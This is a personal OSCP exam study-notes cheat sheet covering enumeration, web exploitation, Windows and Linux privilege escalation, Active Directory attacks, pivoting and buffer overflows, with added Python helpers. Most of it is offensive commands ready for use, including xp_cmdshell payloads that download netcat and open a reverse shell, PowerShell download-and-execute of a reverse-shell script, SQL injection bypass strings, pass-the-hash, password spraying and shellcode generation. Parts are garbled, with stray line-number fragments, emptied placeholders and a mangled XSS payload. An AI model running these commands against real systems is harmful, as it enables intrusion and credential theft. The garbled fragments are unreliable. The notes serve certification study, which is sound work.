# oscp-notes

I passed the OSCP in January 2021. These are the notes I took along my journey to achieving it.

## Table of Contents
- [Enumeration](#Enumeration)
- [Web Exploitation](#Web-Exploitation)
- [Post Exploitation Linux](#Post-Exploitation-Linux)
- [Post Exploitation Windows](#Post-Exploitation-Windows)
- [Active Directory](#Active-Directory)
- [Pivoting & Port Forwarding](#Pivoting--Port-Forwarding)
- [Other](#Other)
- [Buffer Overflow](#Buffer-Overflow)

Enumeration
===============================================================================================
`Basics`

- Standard Port Scan
`sudo nmap -T4 -p- -A --osscan-guess --version-all -oN in.scan -Pn <ip>`

- UDP Port Scan
`sudo nmap --top-ports 100 -sU -oN udp.scan -Pn <ip>`

- Extensions (for web content brute forcing)
`txt,php,aspx,cgi,asp,html,jsp,pdf,doc,docx,xls,xlsx,rtf,bak,xml,xsl,phtml,sh,pl,py,config,php7,exe`

- Wordlists

    /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    /usr/share/seclists/Discovery/Web-Content/common.txt
    /usr/share/seclists/Discovery/Web-Content/big.txt
    /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
    /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
    /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
    /usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt

`TCP 21: FTP`

- Download Everything (anonymous login)
`wget -m ftp://anonymous:anonymous@<ip>`

- FTP Nmap Scan
`nmap --script ftp-anon,ftp-bounce,ftp-brute,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum,ftp-syst -p21 <ip>`

- SSL FTP Connection (explicit FTPS)
`openssl s_client -connect <ip>:21 -starttls ftp`

`TCP 22: SSH`

- Bruteforce
`hydra -l root -P /usr/share/wordlists/password/10k -t 4 ssh://<ip>`

`TCP 25: SMTP`

- Nmap Enumeration
`sudo nmap --script "smtp-commands,smtp-open-relay,smtp-vuln*" -p25 <ip>`

- User Enumeration
`sudo nmap --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY} -p25 <ip>`

- MSF User Enumeration (VRFY/EXPN)
`auxiliary/scanner/smtp/smtp_enum`

- Manual (via `nc <ip> 25`)

    HELO <domain> || EHLO <domain>    - introduce yourself
    EXPN <user> || VRFY <user>        - enumerate users (250/251 = exists, 550 = unknown, 252 = server refuses to confirm)
    MAIL FROM:test@test.org           - send mail from
    RCPT TO:<user>                    - send mail to (also usable for user enumeration when VRFY is disabled)
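The VRFY exchange above, as an added example that is not part of the original notes: the client side of the conversation (banner, HELO, VRFY per user, QUIT) together with the reply-code interpretation, driven against a constructed in-memory responder so it runs offline. The `FakeSMTPSocket` class, its user list and its banner are assumptions standing in for a real MTA; `enum_over_network` is the same logic over a real socket.

```python
"""VRFY-based SMTP user enumeration. Added example; FakeSMTPSocket is a
constructed stand-in for an MTA, not a real server."""
import socket
from typing import Dict, List, Tuple

KNOWN_USERS = {"root", "postmaster", "alice"}   # constructed (assumption)


class FakeSMTPSocket:
    """Socket-like object replying the way a typical MTA does to HELO/VRFY/QUIT."""

    def __init__(self, users=KNOWN_USERS):
        self.users = set(users)
        self.inbox: List[bytes] = [b"220 mail.example.test ESMTP ready\r\n"]
        self.transcript: List[bytes] = []       # every command the client sent

    def sendall(self, data: bytes) -> None:
        self.transcript.append(data)
        verb, _, arg = data.decode(errors="replace").strip().partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.inbox.append(b"250 mail.example.test\r\n")
        elif verb == "VRFY":
            name = arg.strip().strip("<>")
            if name in self.users:
                self.inbox.append(f"250 2.1.5 <{name}@example.test>\r\n".encode())
            else:
                self.inbox.append(f"550 5.1.1 <{name}>: Recipient address rejected\r\n".encode())
        elif verb == "QUIT":
            self.inbox.append(b"221 2.0.0 Bye\r\n")
        else:
            self.inbox.append(b"502 5.5.2 Error: command not recognized\r\n")

    def recv(self, n: int) -> bytes:
        return self.inbox.pop(0) if self.inbox else b""


def read_reply(sock) -> Tuple[int, str]:
    """Read one SMTP reply, including multi-line 'NNN-...' replies (e.g. EHLO)."""
    buf = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
        lines = [l for l in buf.split(b"\r\n") if l]
        # The last line of a reply is "NNN text"; "NNN-text" means more follows.
        if buf.endswith(b"\r\n") and lines and lines[-1][3:4] == b" ":
            return int(lines[0][:3]), buf.decode(errors="replace")


def classify(code: int) -> str:
    """Map a VRFY reply code to a verdict."""
    if code in (250, 251):
        return "valid"
    if code == 252:
        return "ambiguous"       # server will not confirm; fall back to EXPN or RCPT TO
    if code in (550, 551, 553):
        return "invalid"
    if code in (500, 501, 502, 503):
        return "vrfy-disabled"
    return "unknown"


def vrfy_enum(sock, users, helo_name: str = "kali") -> Dict[str, str]:
    """Run the HELO / VRFY / QUIT exchange over any socket-like object."""
    results: Dict[str, str] = {}
    code, _ = read_reply(sock)                  # 220 banner
    if code != 220:
        raise RuntimeError(f"unexpected banner code {code}")
    sock.sendall(f"HELO {helo_name}\r\n".encode())
    read_reply(sock)
    for user in users:
        sock.sendall(f"VRFY {user}\r\n".encode())
        code, _ = read_reply(sock)
        results[user] = classify(code)
        if results[user] == "vrfy-disabled":
            break                               # every further VRFY will fail the same way
    sock.sendall(b"QUIT\r\n")
    read_reply(sock)
    return results


def enum_over_network(host: str, users, port: int = 25) -> Dict[str, str]:
    """Same exchange against a live host (not exercised offline)."""
    with socket.create_connection((host, port), timeout=10) as s:
        return vrfy_enum(s, users)


if __name__ == "__main__":
    print(vrfy_enum(FakeSMTPSocket(), ["root", "bob", "alice"]))
```

A 252 reply is the case that trips people up: the server is saying "cannot VRFY but will accept delivery", so the user list is neither confirmed nor refuted and you need `EXPN` or `RCPT TO` to get a real answer.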

77 | 78 | `TCP 53: DNS` 79 | 80 | - Standard Enum 81 | 82 | nslookup 83 | server 84 | 127.0.0.1 85 | 86 | 87 | - Zone Transfer 88 | `dig axfr @ ` 89 | 90 | - Dns Recon 91 | 92 | dnsrecon -r 127.0.0.0/24 -n 93 | dnsrecon -d -r 10.0.0.0/8 94 | 95 |
96 | 97 | `TCP 79: Finger Enumeration` 98 | 99 | - [Pentest Monkey Link](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) 100 | 101 |
102 | 103 | `tcp 88: Kerberos` 104 | 105 | - Use [Kerbrute](https://github.com/ropnop/kerbrute) to Enumerate Users and Passwords 106 | 107 | - [Rubeus](https://github.com/GhostPack/Rubeus) 108 | 109 |
110 | 111 | `TCP 110: POP3` 112 | 113 | - Nmap Enum Script 114 | `sudo nmap --script pop3-capabilities,pop3-ntlm-info -p110 ` 115 | 116 | - Bruteforce 117 | `sudo nmap --script pop3-brute -p110 ` 118 | `auxiliary/scanner/pop3/pop3_login` 119 | 120 | - Login 121 | 122 | USER 123 | PASS 124 | list - List Emails 125 | retr - Retrieve Email 126 |
127 | 128 | `TCP 111: RPCBIND` 129 | 130 | - Enumeration 131 | `rpcinfo -p ` 132 | `rpcinfo -s ` 133 |
134 | 135 | `TCP 119: NNTP` 136 | 137 | - Possible commands 138 | `HELP, LIST` 139 |

140 | 141 | `TCP 135 MSRPC` 142 | 143 | - Nmap Scan 144 | `sudo nmap -n -sV -Pn -p 135 --script=msrpc-enum ` 145 | 146 | - MSF Enum 147 | 148 | use auxiliary/scanner/dcerpc/endpoint_mapper 149 | use auxiliary/scanner/dcerpc/hidden 150 | use auxiliary/scanner/dcerpc/management 151 | use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor 152 | 153 | - RPC Dump 154 | `/usr/bin/impacket-rpcdump -p 135`

155 | 156 | `TCP 139/445: SMB/RPC` 157 | 158 | - smbmap 159 | `smbmap -H ` 160 | 161 | - [enum4linux-ng](https://github.com/cddmp/enum4linux-ng) 162 | `/opt/enum4linux-ng/enum4linux-ng.py -A ` 163 | 164 | - Version Scan 165 | `use auxiliary/scanner/smb/smb_version` 166 | 167 | - light nmap 168 | `sudo nmap -p445 --script safe 10.10.10.100` 169 | 170 | - Enumerate Share Permissions 171 | `crackmapexec smb --shares` 172 | 173 | - Log Into Shares 174 | `smbclient /// -U ` 175 | 176 | - Dump Info 177 | `python3 /usr/share/doc/python3-impacket/examples/samrdump.py ` 178 | 179 | - Dump Info 180 | `rpcclient -U "" `

181 | 182 | `TCP 143:` 183 | 184 | - Login 185 | `A001 login ` 186 | 187 | - Use Evolution Mail Client to Log In 188 | 189 |
190 | 191 | `TCP 389: LDAP` 192 | 193 | - ldapsearch 194 | `ldapsearch -h -x` 195 | `ldapsearch -h -x -s base namingcontexts` 196 | `ldapsearch -h -x -b ""` 197 | `ldapsearch -h -x -b "" '(objectClass=Person)'` 198 | 199 |
200 | 201 | `TCP 443` 202 | 203 | - Manually Check Certificate 204 | 205 | - Add DNS Names to /etc/hosts 206 | 207 | - SSL Enum 208 | `nmap -sV --script ssl-enum-ciphers ` 209 | 210 | - Nikto 211 | `nikto -h -p 443 -output nikto_443` 212 | 213 | - SSLScan 214 | `sslscan `

215 | 216 | `TCP 1433: MSSQL` 217 | 218 | - Nmap Scan 219 | `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER ` 220 | 221 | - Log In 222 | `sqsh -S -U ` 223 | 224 | - Another Login 225 | `use auxiliary/scanner/mssql/mssql_login`

226 | 227 | `TCP 1521: ORACLE` 228 | 229 | - [Good Blog Post](https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573) 230 | 231 | - [Oracle Database Attacking Tool](https://github.com/quentinhardy/odat) 232 |
233 | 234 | `TCP 2049: NFS` 235 | 236 | - Show Mountable Files 237 | `showmount -a(d)(e) `

238 | 239 | `TCP 3306: MYSQL` 240 | 241 | - Login 242 | `mysql -u -p` 243 | 244 | - Extensive Nmap 245 | `nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 ` 246 | 247 | - MSF Scripts 248 | 249 | use auxiliary/scanner/mysql/mysql_version 250 | use auxiliary/scanner/mysql/mysql_authbypass_hashdump 251 | auxiliary/scanner/mysql/mysql_hashdump 252 | mysql_enum 253 | mysql_schemadump 254 | mysql_start_up 255 | 256 |
257 | 258 | `TCP 3389: RDP` 259 | 260 | - Log In 261 | `rdesktop -u -p ` 262 |
263 | 264 | `UDP 161: SNMP` 265 | 266 | - Enum 267 | `snmpwalk -c public -v2c ` 268 | `snmp-check ` 269 | 270 |
271 | 272 | `Active Directory` 273 | 274 | - [rpcclient](https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf) 275 | 276 | rpcclient (-U '') 277 | enumdomusers 278 | enumdomains 279 | srvinfo 280 | setuserinfo2 23 '' 281 | createdomuser username 282 | setuserinfo2 username 24 283 | 284 | 285 | 286 | - SMB 287 | 288 | - Kerbrute 289 | `./kerbrute userenum --dc -d ` 290 | 291 | - Npusers (Dump hashes for users) 292 | 'GetNPUsers.py -dc-ip -no-pass -usersfile /` 293 | 294 | - [Bloodhound.py](https://github.com/fox-it/BloodHound.py) 295 | 296 | edit /etc/resolve.conf 297 | nameserver 298 | search 299 | python3 bloodhound.py -u -p -ns -d domain -c all 300 | Run Bloodhound 301 | 302 | - ldap 303 | 304 |


Web Exploitation
===============================================================================================
`SQL Injection`

- SQLMap (feed it a saved Burp request)
`sqlmap -r <request.txt>`

- Test for SQLi

    '
    '-- -
    ASCII(97)
    ' or 1=1--
    '; waitfor delay '0:0:20'--       (MSSQL time-based check)
    wfuzz -u http://<ip>/FUZZ -w /usr/share/seclists/Fuzzing/special-chars.txt

- Login Bypass (which comment token works depends on the backend: `--` is standard, `#` is MySQL, `/*` opens a block comment)

    admin' --
    admin' -- -
    admin'-
    admin' #
    admin'/*
    admin' or 1=1--
    admin' or 1=1#
    admin' or 1=1/*
    admin') or '1'='1--
    admin') or ('1'='1--

- Abuse Command Shell (MSSQL; `show advanced options` must be on before `xp_cmdshell` can be enabled)

    ' EXEC sp_configure 'show advanced options', 1--
    ' reconfigure--
    ' EXEC sp_configure 'xp_cmdshell', 1--
    ' reconfigure--
    ' EXEC xp_cmdshell 'certutil -urlcache -f http://<ip>:<port>/nc.exe nc.exe'--
    ' EXEC xp_cmdshell "nc.exe -e cmd.exe <ip> <port>";--

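To see why the login-bypass strings above work, and where they stop working, here is an added example (not from the notes) that runs them against an in-memory SQLite database: the vulnerable string-built query sits beside its parameterised fix. The `users` table, the `admin`/`S3cret!` row and the "wrong" password are constructed.

```python
"""SQLi login bypass, vulnerable vs. parameterised. Added example;
the table and credentials are constructed."""
import sqlite3
from typing import Dict, Tuple


def make_db() -> sqlite3.Connection:
    # Constructed users table with a single account (assumption).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cret!')")
    con.commit()
    return con


def vulnerable_login(con: sqlite3.Connection, username: str, password: str) -> bool:
    # The classic mistake: user input concatenated into the statement text,
    # so a quote in the username ends the literal and the rest is parsed as SQL.
    sql = ("SELECT id FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.OperationalError:
        # Payload broke the query syntax (a 500 in a real app, not a bypass).
        return False


def safe_login(con: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders send the values separately from the statement; a quote is just a quote.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


def try_payloads(payloads) -> Dict[str, Tuple[bool, bool]]:
    """For each payload (used as the username, with a wrong password):
    (vulnerable_login result, safe_login result)."""
    con = make_db()
    return {p: (vulnerable_login(con, p, "wrong"), safe_login(con, p, "wrong"))
            for p in payloads}


if __name__ == "__main__":
    for payload, (vuln, safe) in try_payloads(
            ["admin' --", "admin' or 1=1--", "admin' #", "admin') or '1'='1--"]).items():
        print(f"{payload!r:28} vulnerable={vuln}  parameterised={safe}")
```

Two of the four payloads fail here for backend-specific reasons rather than because the query is safe: `#` is not a comment token in SQLite (it is in MySQL), and the `')` variants assume the original query wraps the condition in parentheses. That is the practical point of keeping the whole list: one query shape per payload.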
`LFI/RFI`

- Linux Path
`../../../../../../../../etc/passwd`

- [Windows LFI](https://github.com/seal9055/Docs/blob/main/windows_lfi)
`c:\windows\system32\drivers\etc\hosts`

- RFI
`http://<ip>/p0wny_shell.php`

- Wordlists

    /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
    /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt

`CGI-BIN`

- Popular Extensions: .sh & .pl

- Nmap Check (Shellshock)
`nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/<script>,cmd=ls <ip>`

- MSF Check
`auxiliary/scanner/http/apache_mod_cgi_bash_env`

- MSF Exploit
`exploit/multi/http/apache_mod_cgi_bash_env_exec`

`XSS`

- Test (the HTML tags of this payload were lost when the notes were exported; only the remainder survives)
`test: /)>`

- Reverse Shell (same caveat; `$IFS` stands in for spaces where they are filtered)
`/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'<ip>'$IFS'<port>')>`

- [SSTI - Server Side Template Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection)

![SSTI](https://github.com/seal9055/Docs/blob/main/SSTI.png?raw=true)

`CMS`

- WORDPRESS
`wpscan --url http://<ip> (--api-token <token>) -e u,ap,at --plugins-detection aggressive`

- MAGENTO
[Magescan](https://github.com/steverobbins/magescan)

`Bruteforce`

- hydra (the string after the last `:` is the failure marker shown on a bad login)
`hydra -l admin -P /usr/share/wordlists/password/10k <ip> http-post-form '/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed' -V -t 64`

Post Exploitation Linux
===============================================================================================

`File Upload`

- Starting Web Server
`python3 -m http.server 80`

- Filetransfer

    wget http://<ip>/<file>
    curl http://<ip>/<file> -o <file>
    echo "GET /<file> HTTP/1.0" | nc -n <ip> 80 > <file> && sed -i '1,7d' <file>   (strips the HTTP headers; check the header count, it varies by server)

- Secure Filetransfers (TLS, so the file does not cross the wire in cleartext)

    on target: ncat -nvlp <port> --ssl > <file>
    on kali:   ncat -nv <target-ip> <port> --ssl < <file>

`Enum Tools`

[LinEnum](https://github.com/rebootuser/LinEnum)
[linux smart enumeration](https://github.com/diego-treitos/linux-smart-enumeration)
[linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
[pspy](https://github.com/DominicBreuker/pspy)
[suid3num](https://github.com/Anon-Exploiter/SUID3NUM)

`Upgrade Shell`
- `python -c 'import pty;pty.spawn("/bin/bash")'`
- `ctrl-z` (background the shell)
- `stty raw -echo; fg`
- `export TERM=xterm`
- `stty -a` on kali to read your terminal size, then in the target shell `stty rows 32 columns 136` (match your own values)
- `export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin`

`Manual`

- `whoami/id/hostname`

- `cat /etc/issue`
- `cat /etc/*-release`

- `history`

- `w`

- `ls -l /etc/passwd`
- `ls -l /etc/shadow`
- `ls -l /etc/group`

- `sudo -l`
    - check for `env_keep+=LD_PRELOAD`
    - check for `env_keep+=LD_LIBRARY_PATH`
    - check `sudo -V`: versions up to 1.8.27 (before 1.8.28) are affected by CVE-2019-14287 (`sudo -u#-1`) when a rule grants `(ALL, !root)`

- `find / -group <group> -ls 2>/dev/null`
- `find / -user <user> -ls 2>/dev/null`

- `cat /etc/exports` (check for NFS exports, especially `no_root_squash`)

- `mount -l`
- `cat /etc/fstab`
- `/bin/lsblk`

- `lpstat -a`
- `lscpu`

`Common Files`

- `grep -Rli password <dir>` across
- `/`
- `/home`
- `/opt`
- `/tmp`
- `/var`

`Cron`

- `cat /etc/crontab`
- `ls -la /etc/cron*` (cron.d, cron.hourly, cron.daily, ...)
- `crontab -l`

`Service Exploits`

- `ps aux | grep "^root"`
- `netstat -antup`

- `<binary> -v`
- `<binary> --version`

- Debian
`dpkg -l | grep <package>`

- Rpm
`rpm -qa | grep <package>`

`SUID & SGID`

`find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null`

- [gtfobins](https://gtfobins.github.io)

- Check For Writeable Shared Files ([Shell](https://github.com/seal9055/Docs/blob/main/suid.c))

    strace <binary> 2>&1 | grep -iE "open|access|no such file"
    create & compile the above linked shell as the missing/writeable shared object
    execute the service

- Incomplete Path (binary calls a program by name rather than full path)

    strings <binary>
    strace -v -f -e execve <binary> 2>&1
    If found, create a binary with a reverse shell in the /tmp directory and add it to the path
    PATH=.:$PATH /<service>

`Kernel Exploits`

- `uname -a`

- `searchsploit linux kernel priv esc`

- `linux exploit suggester`

`Network`

- `ip a / ifconfig`
- `route`
- `ss -anp / netstat -anp`
- `dnsdomainname`
- `ls /etc | grep iptables`
- `cat /etc/networks`
- `netstat -punta`

Post Exploitation Windows
===============================================================================================

`File Upload`

- Starting Webserver
`python3 -m http.server <port>`

- Certutil
`certutil -urlcache -f "http://<ip>:<port>/<file>" <file>`

- SMB (share named `kali` serving the current directory)
`on kali: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .`
`on target: copy \\<ip>\kali\reverse.exe C:\tmp\reverse.exe`

- Powershell
`cmd /c powershell IEX(new-object net.webclient).downloadstring('http://<ip>/Invoke-PowerShellTcp.ps1')`
`powershell.exe IEX(new-object net.webclient).downloadstring('http://<ip>/Invoke-PowerShellTcp.ps1')`
`powershell -c IEX(new-object net.webclient).downloadstring('http://<ip>/Invoke-PowerShellTcp.ps1')`

- Curl
`curl http://<ip>/<file> -o <file>`

`Enum Tools`

- [PowerUp](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1)
`powershell -ep bypass` then `. .\powerup.ps1; Invoke-AllChecks`

- [Sherlock](https://github.com/rasta-mouse/Sherlock)
`powershell -ep bypass` then `Import-Module .\sherlock.ps1; Find-AllVulns`

- [Winpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)

`Manual`

    whoami /priv | /groups | /all
    systeminfo
    hostname
    net users | net user <user>
    set
    tasklist /SVC | tasklist /v

`Kernel Exploits`

- [Windows Exploit Suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester)
- [Secwiki](https://github.com/SecWiki/windows-kernel-exploits)
- [Sherlock](https://github.com/rasta-mouse/Sherlock)

614 | 615 | `Service Exploits` 616 | 617 | - Insecure Service Properties 618 | 619 | SERVICE_START & SERVICE_STOP & SERVICE_CHANGE_CONFIG 620 | sc qc 621 | sc query 622 | sc config binpath= "\"C:\\"" 623 | listener on kali + START/STOP SERVICE 624 | 625 | - Unquoted Service Path 626 | 627 | SERVICE_START & SERVICE_STOP + unquoted service path 628 | 629 | - Weak Registry Permissions 630 | 631 | reg query 632 | 633 | - Insecure Service Executables 634 | 635 | check winpeas for writeable service executable 636 | replace file with reverse shell 637 | 638 | - DLL Hijacking 639 | 640 | Check all services winpeas recognizes 1 by 1 641 | sc qc 642 | 643 |
`Scheduled Tasks`

- `dir C:\windows\tasks`
- `schtasks /query /fo LIST /v`

`Network`

    ipconfig /all
    route print
    arp -a
    netstat -ano
    C:\WINDOWS\System32\drivers\etc\hosts

`Registry`

- Autorun
`Overwrite the autorun program with a reverse shell and restart`

- Always Install Elevated
`Check winpeas for AlwaysInstallElevated (then install a malicious .msi)`

`Common Files`

    %SYSTEMROOT%\repair\SAM
    %SYSTEMROOT%\System32\config\RegBack\SAM
    %SYSTEMROOT%\System32\config\SAM
    %SYSTEMROOT%\repair\system
    %SYSTEMROOT%\System32\config\SYSTEM
    %SYSTEMROOT%\System32\config\RegBack\system
    C:\unattend.xml
    C:\Windows\System32\
    C:\Windows\System32\sysprep\
    C:\sysprep.inf
    C:\sysprep\sysprep.xml

`Passwords`

- Use chisel to remotely forward port 445, and use winexe to log in
`winexe -U '<user>%<pass>' //<ip> cmd.exe`

- Check for passwords
`reg query HKLM /f password /t REG_SZ /s`
`reg query HKCU /f password /t REG_SZ /s`

- Weak Permissions on SAM Files (copy SYSTEM and SAM, dump with creddump)
`python2 pwdump.py <SYSTEM> <SAM>`

- Cracking the password
`hashcat -m 1000 --force <hashfile> <wordlist>`

- PTH (the hash is passed in `LM:NT` form)
`pth-winexe -U '<user>%<LM:NT>' //<ip> cmd.exe`

Active Directory
===============================================================================================

`Manual`

    ipconfig /all
    route print
    arp -a
    netstat -ano
    C:\WINDOWS\System32\drivers\etc\hosts
    netsh firewall show state
    netsh firewall show config
    netsh dump
    net user
    net user /domain
    net group /domain

`Powerview`

    powershell -ep bypass
    . .\powerview.ps1
    net accounts
    Get-NetDomain
    Get-NetDomainController
    Get-DomainPolicy
    Get-NetUser
    Get-NetUser | select cn
    Get-NetUser | select samaccountname
    Get-NetComputer
    Get-NetGroup
    Get-NetGroupMember
    Get-DomainUser -SPN
    Get-NetLoggedon -ComputerName <host>
    Get-NetSession -ComputerName <host>
    Invoke-ShareFinder
    Get-NetGPO
    Invoke-Kerberoast

`Bloodhound`

    powershell -ep bypass
    . .\sharphound.ps1
    Invoke-BloodHound -CollectionMethod All -Domain <domain> -ZipFileName file.zip
    Download the zip onto kali and import it into Bloodhound
    https://github.com/fox-it/BloodHound.py

`Cracking AD Hashes`

    ntlm:   hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
    ntlmv2: hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

`PASS THE PW & HASH`

    crackmapexec smb <ip>/24 -u <user> -d <domain> -p <pass>
    crackmapexec smb <ip>/24 -u <user> -H <NT hash> --local-auth

`Token Impersonation`

    meterpreter> load incognito
    list_tokens -u
    impersonate_token <domain>\\<user>

`Kerberoasting`

    Invoke-Kerberoast in powerview
    Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'c:\temp\hashcapture.txt' -width 8000
    https://github.com/skelsec/kerberoast
    GetUserSPNs.py -request -dc-ip <dc-ip> <domain>/<user>

`Password Spraying`

- Create Password List (`%` is a digit placeholder in crunch)
`crunch <min> <max> -t <prefix>%%%% -o pw.txt`

- Spray (`-n 1` keeps it to one attempt at a time to avoid lockouts)
`crowbar -b rdp -s <ip>/32 -U users.txt -C pw.txt -n 1`

Pivoting & Port Forwarding
===============================================================================================

- [Chisel](https://github.com/jpillora/chisel/releases) (download the windows & linux versions)

    On kali:   sudo ./chisel server --reverse --port <port>
    On target: ./chisel client <kali-ip>:<port> R:<local-port>:127.0.0.1:<remote-port>
    (the target's 127.0.0.1:<remote-port> is then reachable on kali at 127.0.0.1:<local-port>)

Other
===============================================================================================

`Hashcracking`

- John
`john --format=<format> --wordlist=/usr/share/wordlists/rockyou.txt hash.txt`

- Hashcat

    hashcat -m <mode> -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt -O
    hashcat -m <mode> -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt -O -r /usr/share/hashcat/rules/best64.rule
    cat pw | hashcat -r /usr/share/hashcat/rules/best64.rule --stdout > wordlist.txt

`SSH Encrypted`
- `/usr/share/john/ssh2john.py <id_rsa> > ssh.hash`, then crack with john

`Crack Zip Pw`
- `fcrackzip -uvDp /usr/share/wordlists/rockyou.txt file.zip`

`Tcp Dump`
- `sudo tcpdump -i tun0 icmp` (confirm blind command injection by pinging yourself)

`Images`
- `binwalk <file>`
- `binwalk -Me <file>`

`Recognize Encryption`
- [Tio.run](https://tio.run/#)

`Pip fix (Rarely works)`

    curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
    python get-pip.py
    python -m pip install requests

`MYSQL`

    show databases;
    use <database>;
    show tables;
    select * from <table>;

Buffer Overflow
===============================================================================================

- [Tib3rius](https://tryhackme.com/room/bufferoverflowprep)

    !mona config -set workingfolder c:\mona\%p
    /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length>
    !mona findmsp -distance <length>                (gives the EIP offset; then confirm with retn = BBBB)
    !mona bytearray -b "\x00"
    python bad_chars.py                             (send the byte array after the offset + retn)
    !mona compare -f C:\mona\oscp\bytearray.bin -a <esp address>
    !mona jmp -r esp -cpb "\x00"                    (find a JMP ESP free of bad chars)
    msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=4444 EXITFUNC=thread -b "\x00<other bad chars>" -f py
    padding = "\x90" * 16

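The helper logic behind that workflow, as an added example that is not the room's `bad_chars.py` nor Metasploit's own scripts: a Metasploit-style cyclic pattern and offset lookup, the bad-character array that `!mona compare` checks, a comparison routine that reports the first mangled byte, and the final buffer layout. The EIP value `0x33614132`, the return address `0x625011af` and the bad-character set are constructed.

```python
"""Buffer overflow helpers: cyclic pattern, offset, bad chars, payload layout.
Added example; all addresses and bad-character sets are constructed."""
import socket
import struct
from string import ascii_uppercase, ascii_lowercase, digits
from typing import Optional

MAX_PATTERN = 26 * 26 * 10 * 3   # 20280: beyond this the pattern repeats and offsets become ambiguous


def pattern_create(length: int) -> str:
    """Same 'Aa0Aa1Aa2...' sequence as pattern_create.rb."""
    if length > MAX_PATTERN:
        raise ValueError("pattern would repeat; use a shorter length")
    out = []
    for u in ascii_uppercase:
        for l in ascii_lowercase:
            for d in digits:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern: str, eip) -> int:
    """Offset of the EIP value in the pattern. `eip` is the int from the debugger
    (little-endian x86, so 0x33614132 means the bytes '2Aa3') or the 4-char str."""
    needle = struct.pack("<I", eip).decode("ascii") if isinstance(eip, int) else eip
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("value not in pattern: wrong endianness, or EIP was not hit by the pattern")
    return idx


def badchar_array(bad=(0x00,)) -> bytes:
    """Every byte 0x00-0xff except the ones already known to be bad."""
    excluded = set(bad)
    return bytes(b for b in range(256) if b not in excluded)


def first_mangled(sent: bytes, seen: bytes) -> Optional[int]:
    """What !mona compare tells you: the first byte that differs between the array
    sent and what landed at ESP. Re-run after excluding it, because one bad byte
    usually corrupts everything after it. Returns None if nothing was mangled."""
    for s, r in zip(sent, seen):
        if s != r:
            return s
    return None if len(seen) >= len(sent) else sent[len(seen)]


def build_payload(offset: int, ret: int, shellcode: bytes,
                  nops: int = 16, total: Optional[int] = None) -> bytes:
    """Final layout: filler up to EIP, JMP ESP address, NOP sled, shellcode, padding."""
    buf = b"A" * offset + struct.pack("<I", ret) + b"\x90" * nops + shellcode
    if total is not None:
        buf = buf.ljust(total, b"C")
    return buf


def send_to_target(host: str, port: int, prefix: bytes, payload: bytes) -> None:
    """Deliver prefix + payload to the vulnerable service (not exercised offline)."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)
        s.sendall(prefix + payload + b"\r\n")


if __name__ == "__main__":
    pat = pattern_create(400)
    off = pattern_offset(pat, 0x33614132)                 # constructed EIP value
    print("offset:", off)
    print("first bad char:", first_mangled(badchar_array(), badchar_array((0x00, 0x0a))))
    print(build_payload(off, 0x625011af, b"\xcc" * 4, total=40))   # constructed JMP ESP address
```

The `first_mangled` check mirrors the iterative step the room teaches: exclude the reported byte from both `badchar_array` and the `-b` list passed to msfvenom, resend, and repeat until the array compares clean, since a byte that follows a bad one cannot be judged until the earlier one is removed.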